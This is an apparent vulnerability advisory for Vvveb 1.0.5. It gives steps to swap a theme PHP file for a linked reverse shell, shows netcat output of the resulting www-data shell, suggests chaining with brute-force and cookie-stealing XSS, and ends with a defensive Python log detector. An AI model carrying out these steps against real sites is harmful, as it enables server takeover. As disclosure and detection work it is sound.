Vvveb 1.0.5 | Non-validated Theme Editing Allows Privilege Abuse and RCE
Information
| Software Type | Web App |
|---|---|
| Software Name | Vvveb |
| Affected Version | 1.0.5 |
| Software Vendor | Vvveb |
| Software Link | https://github.com/givanz/Vvveb |
| Severity | Critical |
| CVSS Score | 9.1 |
| CVE Link | Pending |
| Affected Assets | 163+ |
| Date of Discovery | Jan 3rd, 2025 |
| PoC Exploit | https://gist.github.com/0xHamy/f16fb399f8dd3a973acadc18fa07b1cb |
Description
Admins can modify plugin code and run it, with no validation in place to prevent malicious code execution. An authenticated admin can edit theme code through this endpoint: /vadmin123/index.php?module=editor/code&type=themes
Through this endpoint, you can modify the code of a PHP file (theme.php) to gain shell access on the web server.
Reproduce
To reproduce RCE, open the following endpoint:
/vadmin123/index.php?module=editor/code&type=themes
Find and edit theme.php, replace its code with the following shell:
https://gist.github.com/0xHamy/f16fb399f8dd3a973acadc18fa07b1cb
Remember to replace the IP and port with the IP and port of your listener; you can use a listener such as netcat.
Save the PHP file and run it by opening the following page:
/vadmin123/index.php?module=editor/editor&url=/&template=index.html
Watch your netcat listener and you will get a reverse shell connection:
$ nc -lnvp 6060
Listening on 0.0.0.0 6060
Connection received on 127.0.0.1 33862
Linux hx0 6.8.0-51-generic #52-Ubuntu SMP PREEMPT_DYNAMIC Thu Dec 5 13:09:44 UTC 2024 x86_64 Linux
sh: w: not found
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/bin/sh: can't access tty; job control turned off
/ $
On its own, this vulnerability may have limited impact, but when combined with a password brute-force attack on the admin panel and an XSS that leads to cookie theft, it becomes quite impactful and results in full compromise.
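As an added example (not part of this advisory or of the Vvveb project), the following Python script shows how a defender could spot this abuse pattern in web server access logs: a write to the theme code editor followed shortly by a request that renders a template from the same source address. The admin path `/vadmin123/` and the two endpoints come from the advisory; the assumption that saving the edited file is a POST to the same `editor/code` endpoint is mine, and the log lines are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Apache/nginx "combined" log format:
# ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Admin path as used in the advisory; adjust to the install being monitored.
ADMIN_PREFIX = "/vadmin123/"

# Constructed sample log: one client opens the theme editor, saves a file,
# then renders a template; an unrelated client fetches the front page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2025:21:40:01 +0000] "GET /vadmin123/index.php?module=editor/code&type=themes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2025:21:40:22 +0000] "POST /vadmin123/index.php?module=editor/code&type=themes HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2025:21:40:30 +0000] "GET /index.php HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2025:21:40:35 +0000] "GET /vadmin123/index.php?module=editor/editor&url=/&template=index.html HTTP/1.1" 200 22034 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["path"])
    rec["url_path"] = url.path
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec


def classify(rec):
    """Tag a parsed record as a theme code write, a template render, or None."""
    if not rec["url_path"].startswith(ADMIN_PREFIX):
        return None
    q = rec["query"]
    # Assumption: saving from the code editor is a POST to the same module/type.
    if rec["method"] == "POST" and q.get("module") == "editor/code" and q.get("type") == "themes":
        return "theme_code_edit"
    # The render endpoint from the advisory: editor/editor with a template parameter.
    if q.get("module") == "editor/editor" and "template" in q:
        return "theme_render"
    return None


def find_suspicious_sequences(lines, window=20):
    """Return alerts for sources that write theme code and then render a template
    within `window` log lines; each alert carries the IP and both timestamps."""
    events = []
    for idx, line in enumerate(lines):
        rec = parse_line(line)
        if rec is None:
            continue
        tag = classify(rec)
        if tag:
            events.append((idx, rec["ip"], tag, rec["time"]))
    alerts = []
    for i, (idx, ip, tag, t) in enumerate(events):
        if tag != "theme_code_edit":
            continue
        for jdx, ip2, tag2, t2 in events[i + 1:]:
            if ip2 == ip and tag2 == "theme_render" and jdx - idx <= window:
                alerts.append({"ip": ip, "edit_at": t, "render_at": t2})
                break
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_sequences(SAMPLE_LOG.splitlines()):
        print("theme edit followed by render:", alert)
```

A plain GET to the editor page is deliberately not flagged, since browsing the editor is normal admin activity; the signal is the write followed by a render from the same source. In production the same rule is better expressed in your SIEM, and the POST assumption should be confirmed against a real save request before relying on it.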
Search my website for more vulnerabilities found in Vvveb to get a full understanding of the attack vectors you could use during your penetration tests.
Proof of Concept (PoC) Video
Posted on: January 10, 2025 10:55 PM